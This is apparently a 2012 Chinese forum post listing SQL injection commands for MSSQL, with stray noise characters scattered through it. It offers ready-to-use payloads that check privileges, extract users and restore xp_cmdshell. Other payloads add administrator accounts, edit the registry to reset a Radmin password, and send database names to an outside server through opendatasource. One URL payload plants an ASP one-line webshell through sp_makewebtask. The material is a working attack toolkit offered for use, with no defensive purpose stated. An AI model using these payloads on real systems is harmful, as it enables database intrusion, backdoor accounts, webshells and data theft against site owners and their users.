阿D常用的一些注入命令
/ A" g: Z5 [ ~% \% q1 f//看看是什么权限的
w( e- N9 o6 ?9 qand 1=(Select IS_MEMBER('db_owner'))
' w/ u( x1 C. f8 s6 n6 UAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--' a4 N, h B* I# z' |
% X; c# G6 `/ `//检测是否有读取某数据库的权限1 E/ b& h5 I; h( m6 \ Q: P
and 1= (Select HAS_DBACCESS('master'))0 v' z8 @) g4 y6 f. B
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --$ J# f3 V8 {" f8 I$ t( R. I f
& x2 P9 x* @! z2 n. Z/ g5 O8 K; }7 R
数字类型
$ r M! p- L7 ~/ qand char(124)%2Buser%2Bchar(124)=0
5 T' u0 \/ f$ H8 I
( }6 w" g% h( ?1 o6 h字符类型! n' X" t, {- H1 u) {: @$ X. V* t
' and char(124)%2Buser%2Bchar(124)=0 and ''='. z2 G" Q* ]5 T7 t# z. a
; c" ?" F' p S' p( x" g
搜索类型
6 l+ b* o' e) }. g& {( e) l' and char(124)%2Buser%2Bchar(124)=0 and '%'='
" V8 i$ m/ J; J9 ~8 a E; Q' R
, H9 o0 W# Q6 X- p爆用户名
7 x' m/ S2 d) a# c: Rand user>03 ^3 i7 A8 E, C; {" e9 C" Q& x. q
' and user>0 and ''='6 c8 ]2 N/ [3 Z7 D: f' A
1 O5 x* g+ ~: z) S4 m. I检测是否为SA权限
) }' m$ z8 S {2 {! X" c& q0 M; o" eand 1=(select IS_SRVROLEMEMBER('sysadmin'));--' \9 ]$ ]% X0 t7 o# Z
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
! V% S# t) }! m8 ~2 `2 E) w7 b
检测是不是MSSQL数据库7 c; L) k1 N* p7 F
and exists (select * from sysobjects);--
) ]; N0 X) U* P8 l7 B4 r
' G: Q9 r; J0 t7 u& T检测是否支持多行
8 l M6 w& u* E# J# r;declare @d int;--
8 v p' k7 U( o) i0 l
: K1 ?1 u$ D8 @恢复 xp_cmdshell! M/ S: _( E3 l1 _" r& ~. E* F+ ?
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--9 Q% ?) B) m( p3 r, O8 \( |- ~
: X, n6 R0 R# r
9 e% }6 l8 w4 k. h( {- Eselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# e0 l( g2 Y& j' x5 {" k
3 z, R8 D( ~0 k Z5 f+ w; C//-----------------------3 X* J1 ]1 C1 v9 m. p) j- `0 p
// 执行命令
3 S- q- y- \$ \' _$ c//-----------------------5 G; ~8 M$ \* M, l$ Y' R. _6 R. A
首先开启沙盘模式:
" ?4 [+ W4 B7 ~* c! m0 Xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" t: n, K1 [& Q2 J6 g5 c/ E
. d/ \; K, a: Q- u$ i, S: d
然后利用jet.oledb执行系统命令
) D7 J$ f$ ^8 I D+ Q! sselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
' o: n4 T- k# T* l9 D
! m# @; N7 Y: a2 `, \3 e. i/ a执行命令
4 O& e1 w1 }0 |4 w1 k0 p3 C;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
! L4 r7 h# S9 x+ p$ j0 Y
" j3 i: g4 c7 k8 c. QEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
0 z& o3 q8 Q! h0 ]& J- j- s m) x: W! ~( B H, Q
判断xp_cmdshell扩展存储过程是否存在:% _" |+ n0 q* |2 H+ a' m p
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
; k+ g* T" v) @& X* z
i: `1 q) K1 r: S o0 f3 _* H$ S9 ]( \6 r写注册表2 T8 y/ e+ m6 G5 I/ k0 l
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
: O* [, c3 n' ^1 z, | X2 G
% c8 W$ d( `. ~" A7 q. S0 IREG_SZ
" Q% ?' b. Z, `9 ~9 h% V
* t7 l0 H! O" z1 T; F3 R! y" V读注册表# h1 |$ A5 W6 L. z; q* ?
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'# z1 Z! b2 ?9 B
+ L0 [, _1 v: H; [9 r9 M读取目录内容; ?7 G5 @% `" T* b% ^- D
exec master..xp_dirtree 'c:\winnt\system32\',1,1& I8 l+ N; V7 q# H- s, j
1 q6 I2 @" K- O- B. `. |
) o$ J9 L6 v) ^( g( S% b数据库备份
# M# [& ~. ?; A4 x, vbackup database pubs to disk = 'c:\123.bak': N- z( [+ V5 I; o( {" C# ]
# s$ B8 a' k8 n& L1 g) g7 r
//爆出长度1 s( u" ~ e6 F. L* ]0 D
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& ~# J: i0 v- Y8 o3 s# C2 F7 ~( Z2 j4 c! F
8 ?: D+ H6 h5 i# J- D i0 S9 s5 Z0 u; u9 [/ f
更改sa口令方法:用sql综合利用工具连接后,执行命令:
0 z: c: [- I: H" i% @exec sp_password NULL,'新密码','sa'3 D" S! W! J+ u3 l% m
1 Y. V: c7 f5 e" j
添加和删除一个SA权限的用户test:! g A w3 T* s/ o+ t
exec master.dbo.sp_addlogin test,ptlove7 e' a" `( z! L- ]" P5 m
exec master.dbo.sp_addsrvrolemember test,sysadmin, T4 c! A2 S& C e" W+ w. L
5 l! t$ H- a9 |. ^% [: ?
删除扩展存储过过程xp_cmdshell的语句:
2 @4 A1 K. u! n9 h: ^1 \- Y! l [exec sp_dropextendedproc 'xp_cmdshell'# i/ A. N$ i7 I$ y( D0 a
8 ~9 s1 Q' v5 e% ]9 h添加扩展存储过过程0 _1 K8 o4 [ D
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 _$ F! G* b' G6 cGRANT exec On xp_proxiedadata TO public
! o+ h5 {6 X5 Y* Q S/ ^1 J( m+ }- N2 H+ _7 N, f; Z$ c+ w8 I5 Y
7 A; u/ C1 a0 Z/ X; c停掉或激活某个服务。 * c r8 L! S+ |- D( o. V
, f+ B6 W# a; Y3 @% D" s
exec master..xp_servicecontrol 'stop','schedule'
1 {2 n* o, v# y& a: g9 Nexec master..xp_servicecontrol 'start','schedule'
; i( ^! i1 J" e& O3 w, `& V& O: e. a9 B* K M: f
dbo.xp_subdirs* A2 C$ _! h0 A5 t. r* H+ @
3 P& Z1 o; n7 s7 u
只列某个目录下的子目录。7 Z3 B, ~& }, p/ \5 M& T
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp') K0 Z% S% o+ U4 m
" O( f6 C2 K$ K# v% B/ }dbo.xp_makecab) e9 T: x4 w0 t4 k- `
k1 n, P1 H6 a( `2 p
将目标多个档案压缩到某个目标档案之内。
4 {, i3 ^7 E# S2 u所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。) h; ^+ J- z5 j8 r6 [! v6 Z% W
( ^! c# \# W# V6 n' Ndbo.xp_makecab8 e( [+ H9 Q. w; j
'c:\test.cab','mszip',1,
- ]1 H2 K5 n* I- {" ~! ~4 h'C:\Inetpub\wwwroot\SQLInject\login.asp',0 B, D* {5 Y: U/ @/ {
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'- O% p$ d( J- ]5 l, V' n4 l3 J
; ], }. P7 O* Oxp_terminate_process
/ K! v6 P& \7 l4 ^2 R% {& w8 [
停掉某个执行中的程序,但赋予的参数是 Process ID。0 z5 W+ B" H- a) x& M
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
! K" A* @9 W. P, H" K" g
: b, e2 ?" R, c0 N% f! \xp_terminate_process 2484
& J3 \# r3 g; Z
' S6 P: B. F- ?1 d4 {xp_unpackcab; D2 U$ q8 Y) ]
) V0 a6 L$ ?8 v0 y+ L5 m
解开压缩档。! T/ F( f# G' O' r) V6 N
1 W$ ?' e8 S. hxp_unpackcab 'c:\test.cab','c:\temp',1 A5 o1 C' W1 j
) v% Q6 E: R/ e, X
( v9 c" c( H2 X8 R' N3 m某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12345 F. f# G5 ^8 a O/ m
; X8 {% e4 x4 i/ P
create database lcx;* _, F9 j U4 U4 V
Create TABLE ku(name nvarchar(256) null);4 j1 K# }6 d( L! F; Q: g: N/ P
Create TABLE biao(id int NULL,name nvarchar(256) null);! t7 d& ]( F8 l) S0 ]1 U/ n
4 q- o3 Z3 ?* a; c D//得到数据库名0 w' ]. C( ~3 I! [% }
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases( k. m: [1 k) B! M
! \- D9 h' T& \1 ~2 b
3 C* P: k% `" O0 ` t0 p- U//在Master中创建表,看看权限怎样* `$ |: ^: \; B8 `
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
& A# _+ |+ n( z! c# c5 D, i; @& R- O3 H: F) L
用 sp_makewebtask直接在web目录里写入一句话马:3 S- V! Y1 o: l" j- u
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
- P( v: D) R9 Z/ @4 q. }* l
& A8 Q/ d y4 C) W* {2 _: f) o* M; ^//更新表内容( p( B0 l; t5 f9 u+ s& I; X; h( z
Update films SET kind = 'Dramatic' Where id = 123
* r7 _! ~8 q/ ^5 L! m
, H% t2 |) k1 S( \! C* B9 i//删除内容5 U. q# d9 C: l
delete from table_name where Stockid = 3 |
发表于 2012-9-13 17:26:30
收藏
支持
反对